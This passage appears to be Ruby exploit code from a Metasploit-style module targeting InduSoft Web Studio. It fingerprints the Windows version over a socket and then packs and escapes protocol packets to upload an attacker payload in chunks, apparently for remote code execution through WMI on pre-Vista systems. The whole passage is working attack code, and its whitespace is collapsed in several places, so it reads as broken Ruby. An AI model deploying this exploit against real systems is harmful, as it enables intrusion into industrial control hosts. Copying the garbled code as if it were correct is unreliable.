print_error("#{@peer} - InduSoft Web Sutio hasn't been detected, trying to exploit anyway...")
end
# Get Operating System
data=[0x13].pack("C")
sock.put(data)
os_info=sock.get_once
ifos_info!~/WINXP/andos_info!~/WIN2K3/
print_error("#{@peer} - Exploitation through Windows Management Instrumentation service only works on windows pre-vista system, trying to exploit anyway...")
end
# Upload file
data="\x02\x37"# Command => Select destination
data<<[my_payload.length].pack("V")# Data length
data<<"#{filename}"# File name to upload
data<<"\x09\x00\x30\x00\x00\x00"
data<<"\x10\x03"# End of packet
# The data must be split on 1024 length chunks
offset=0# Data to send
count=1# Number of chunks sent
groups=0# Data must be sent in groups of 50 chunks
chunk=my_payload[offset,1024]
whilenotchunk.nil?
# If there is a group of chunks, send it
ifcount%51==0
data<<"\x02\x2c"# Command => Send group of chunks
my_count=[count].pack("V")# Number of chunks
data<<my_count.gsub(/\x10/,"\x10\x10")
data<<"\x10\x03"# End of packet
sock.put(data)
res=sock.get_once
ifres!~/\x02\x06\x10\x03/
returnres
end
count=count+1
groups=groups+1
data=""
end
pkt=[0x02,0x2e].pack("C*")# Command => Chunk Data
my_count=[count].pack("V")
pkt<<my_count.gsub(/\x10/,"\x10\x10")# Chunk ID
pkt<<[chunk.length].pack("V").gsub(/\x10/,"\x10\x10")# Chunk Data length
pkt<<chunk.gsub(/\x10/,"\x10\x10")# Chunk Data
pkt<<"\x10\x03"# End of packet
data<<pkt
offset=(count-groups)*1024
chunk=my_payload[offset,1024]
count=count+1
end
pkt=[0x02,0x03].pack("C*")# Command => End of File